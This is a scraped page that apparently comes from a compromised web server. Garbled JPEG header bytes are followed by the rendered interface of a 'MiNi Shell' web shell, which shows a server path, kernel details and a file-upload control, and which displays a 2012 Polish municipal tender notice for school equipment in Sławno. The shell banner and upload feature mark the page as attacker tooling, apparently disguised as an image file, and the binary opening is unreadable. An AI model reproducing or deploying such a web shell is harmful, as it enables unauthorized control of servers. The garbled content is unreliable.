JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120808/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120808/291410-N-2012.html

<p class="kh_header"><b>Sławno: Dostawa doposażenia bazy dydaktycznej szkół w ramach Projektu   Siła nauki  współfinansowany  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego  Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 291410 - 2012; data zamieszczenia: 08.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sławno , ul. Marszałka Józefa Piłsudskiego 31, 26-332 Sławno, woj. łódzkie, tel. 044 755-18-50, faks 044 755-18-51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugslawno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa doposażenia bazy dydaktycznej szkół w ramach Projektu   Siła nauki  współfinansowany  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego  Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa doposażenia bazy dydaktycznej szkół 
w ramach Projektu   Siła nauki  współfinansowany  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego  Kapitał Ludzki
	tablic dydaktycznych
	plansz dydaktycznych, 
	gier edukacyjnych 
	pomocy dydaktycznych 
	specjalistycznego oprogramowania
	laptopów wraz z oprogramowaniem
	drukarki
	papieru samoprzylepnego
	tuszu
	wyposażenia sali - meble ( 2 segmenty)

CZĘŚĆ I
	tablic dydaktycznych
	plansz dydaktycznych, 
	gier edukacyjnych 
	pomocy dydaktycznych 
	specjalistycznego oprogramowania
CZĘŚĆ II
	laptopów wraz z oprogramowaniem
	drukarki
	papieru samoprzylepnego
	tuszu
CZĘŚĆ III
	wyposażenia sali - meble ( 2 segmenty)

    

   do  szkół na terenie gminy Sławno tj.  
	PSP w Celestynowie, 
PSP im. Ks. Jana Twardowskiego w Kamieniu , 
	PSP w Kozeninie, 
	PSP im. Wandy i Henryka Ossowskich w Kunicach, 
	PSP im. Jana Pawła II w Sławnie i
	PSP w Zachorzowie.

zgodnie ze  szczegółowym opisem parametrów techniczno - użytkowych określonych w załącznikach   Nr 2, Nr 2a, Nr 3, nr 3a, Nr 4  i Nr 4a do siwz

W ramach projektu  Siła nauki  współfinansowanego  ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego  Kapitał Ludzki

Priorytet IX.  Rozwój wykształcenia i kompetencji w regionach,
Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, 
Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. 

2.	Zamawiający wymaga, żeby dostarczone 
	tablice dydaktyczne
	plansze dydaktyczne, 
	gry edukacyjne 
	pomoce dydaktyczne 
	specjalistyczne oprogramowanie
	laptopy wraz z oprogramowaniem
	drukarki
	papiery samoprzylepny
	tusz
	wyposażenia sali - meble ( 2 segmenty)


      były nowe, kompletne, wykonane ramach bezpiecznych technologii oraz żeby spełniały
      wymagania obowiązujących norm,  zapakowane w opakowania umożliwiające
       jednoznaczną identyfikację zapakowanego   produktu.
3. Zamawiający wymaga, żeby wszystkie elementy przedmiotu zamówienia, które tego
      wymagają były zaopatrzone w instrukcję w języku polskim.
4. Materiały dydaktyczne dostarczone w ramach zawartej umowy winny spełniać wymagania
     norm UE.
5.Produkty, które tego wymagają winny posiadać odpowiednio do asortymentu niezbędne
    certyfikaty bezpieczeństwa, atesty, świadectwa jakości i spełniać wszelkie wymogi norm
    określonych obowiązującym prawem.
6. Wszystkie urządzenia i sprzęt muszą posiadać certyfikaty i atesty dopuszczające do użytku
     w szkole określone w odrębnych przepisach. 
7. Produkty, które tego wymagają muszą posiadać niezbędne certyfikaty bezpieczeństwa. 
8 Zaleca się, aby dostarczony asortyment zapakowany był w pudełkach uniemożliwiających
    uszkodzenie produktów w czasie transportu.
9. Odpowiedzialność za uszkodzenia produktów w czasie transportu ponosi Wykonawca.
10. Wady towaru powstałe z winy Wykonawcy, których Zamawiający nie mógł stwierdzić 
       przy odbiorze, zostaną usunięte przez Wykonawcę poprzez wymianę towaru na nowy 
      w terminie 7 dni od zgłoszenia przez Zamawiającego.
11. Wykonawca dostarczy materiały bezpośrednio do szkół, każda dostawa będzie
         uzgodniona     szczegółowo pomiędzy Zamawiającym, a Wykonawcą.
12. Wykonawca we własnym zakresie zapewni rozładunek dostarczonego przedmiotu
       zamówienia 
13. Wskazane w opisie przedmiotu zamówienia np. znaki towarowe, patenty są uzasadnione 
       specyfiką przedmiotu zamówienia i mają na celu wskazanie jedynie jakości przedmiotu 
       zamówienia oraz sprecyzowanie oczekiwań jakościowych i technologicznych
       Zamawiającego. W związku z powyższym Zamawiający dopuszcza możliwość
      przedstawienia w ofercie asortymentu równoważnego (innego niż podany z nazwy
         przez Zamawiającego w załącznikach nr 2-3 do SIWZ).
14. Wykonawcy zgodnie może dostarczyć materiały równoważne  pod warunkiem, 
iż oferowany asortyment będzie o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych oraz użytkowych co wskazany w dokumentacji konkretny
z nazwy oraz będzie spełniać wszystkie wymagania Zamawiającego. Równoważne produkty i urządzenia muszą być dopuszczone do obrotu i stosowania zgodnie z obowiązującym prawem.
15.Wszystkie wymienione w Zał. Nr 2-3 do SIWZ wymagania techniczne należy traktować jako minimalne. Obowiązek wykazania, iż oferowany przedmiot zamówienia spełnia wymagania Zamawiającego, leży po stronie Wykonawcy. W przypadku zaoferowania towaru równoważnego Wykonawca obowiązany jest do oferty koniecznie załączyć szczegółową specyfikację, zdjęcia oferowanego asortymentu celem potwierdzenia zgodności z niniejszą specyfikacją. Wszelkie ryzyko (w tym koszty ewentualnych ekspertyz) związane z udowodnieniem tzw. równoważności przedmiotu zamówienia  wskazanych w załącznikach nr 2-3 do SIWZ, spoczywa na Wykonawcy. Wykonawca zobowiązany jest w takim przypadku wykazać, że dostarczane przez niego artykuły spełniają wymagania określone przez zamawiającego.
16. Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi 
      na okres min. 12 miesięcy od dnia odbioru dostawy bez zastrzeżeń na przedmiot 
      zamówieni na który udzielona została gwarancja producenta..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 37.52.41.00-8, 48.19.00.00-6, 39.16.00.00-1, 30.21.31.00-6, 30.19.94.10-7, 30.23.21.10-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony we wszystkich pozycjach  formularz ofertowy (wg załączonego wzoru Nr 1 ) 
2.	Wypełniony formularz specyfikacji cenowej  wg załączonego wzoru do celów poglądowych 
nie podlega ocenie  ( wg załączonego wzoru Nr 2a, Nr 3a, Nr 4a ) w przypadku części  Nr 3a
należy  uwzględnić dostawy do wszystkich szkół łącznie i tak wyliczoną cenę  wpisać  w formularz 
ofertowy 
3. Dokument pełnomocnictwa - ( oryginał lub notarialnie poświadczona kopia ) do podpisania oferty, 
      jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem 
      rejestracyjnym, również w przypadku złożenia  oferty przez wykonawców ubiegających 
      się o zamówienie wspólnie ( np. konsorcjum, sp. cywilna ), pełnomocnictwo powinno 
      jednoznacznie   określać zakres umocowania  i wskazywać osobę pełnomocnika.
      W przypadku podmiotów   występujących wspólnie w dokumencie  pełnomocnictwa należy 
      wskazać wszystkich wykonawców, którzy wspólnie ubiegają się o udzielenie  zamówienia, a każdy 
       z nich powinien  podpisać  się pod tym dokumentem 
Dokumenty, o których mowa wyżej mogą być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem obustronnie w przypadku druku na dwóch stronach  przez wykonawcę lub osobę uprawnioną do potwierdzania dokumentów firmy (upoważnienie winno być zawarte  w ofercie) 
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia  dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. 

Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W szczególności Zamawiający ustanawia następujące warunki umożliwiające zmianę treści umowy:
Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia  co najmniej jednej 
z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia. 
1. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności 
      wstrzymanie dostawy przez Zamawiającego,
2. Zmiana miejsca dostawy, 
3. Zmniejszenie ilości dostaw z określeniem maksymalnej wielkości tego zmniejszenia,
4. Przedłużenie terminu lub poprawienie warunków gwarancji,
5. Zmiany parametrów dostawy w przypadku obniżenia kosztu ponoszonego przez Zamawiającego 
    na eksploatację, konserwację,
6. Poprawienie sprawności, wydajności lub innego zwiększenia wartości dostawy dla zamawiającego
7. Aktualizacja rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów
8. Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz wykonawcy skutkujące 
     niemożliwością prowadzenia dostaw,
9. Zmiany osobowe: zmiana osób, przy pomocy których Wykonawca i Zamawiający realizuje 
       przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami
       i kwalifikacjami,
7.1. Pozostałe zmiany:
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ,
b)	zmiana obowiązującej stawki VAT. Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez wykonawcę,
c)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy 
d)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł 
w związku z wynikającymi z umowy planowanymi świadczeniami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugslawno pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
pokój Nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2012 godzina 10:00, miejsce: Urząd Gminy w Sławnie
ul. Marszałka Józefa Piłsudskiego 31
pokój Nr 13 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projektu   Siła nauki  współfinansowany  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego  Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa doposażenia bazy dydaktycznej szkół 
w ramach Projektu   Siła nauki  współfinansowany  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego  Kapitał Ludzki  CZĘŚĆ I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa doposażenia bazy dydaktycznej szkół 
w ramach Projektu   Siła nauki współfinansowany  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego  Kapitał Ludzki
CZĘŚĆ I
	tablic dydaktycznych
	plansz dydaktycznych, 
	gier edukacyjnych 
	pomocy dydaktycznych 
	specjalistycznego oprogramowania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 37.52.41.00-8, 48.19.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa doposażenia bazy dydaktycznej szkół 
w ramach Projektu   Siła nauki  współfinansowany  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego  Kapitał Ludzki
CZĘŚĆ II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa doposażenia bazy dydaktycznej szkół 
w ramach Projektu   Siła nauki  współfinansowany  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego  Kapitał Ludzki
CZĘŚĆ II
	laptopów wraz z oprogramowaniem
	drukarki
	papieru samoprzylepnego
	tuszu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.19.94.10-7, 30.23.21.10-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest dostawa doposażenia bazy dydaktycznej szkół 
w ramach Projektu   Siła nauki  współfinansowany  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego  Kapitał Ludzki
CZĘŚĆ III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa doposażenia bazy dydaktycznej szkół 
w ramach Projektu   Siła nauki  współfinansowany  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego  Kapitał Ludzki
CZĘŚĆ III
wyposażenia sali - meble ( 2 segmenty).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com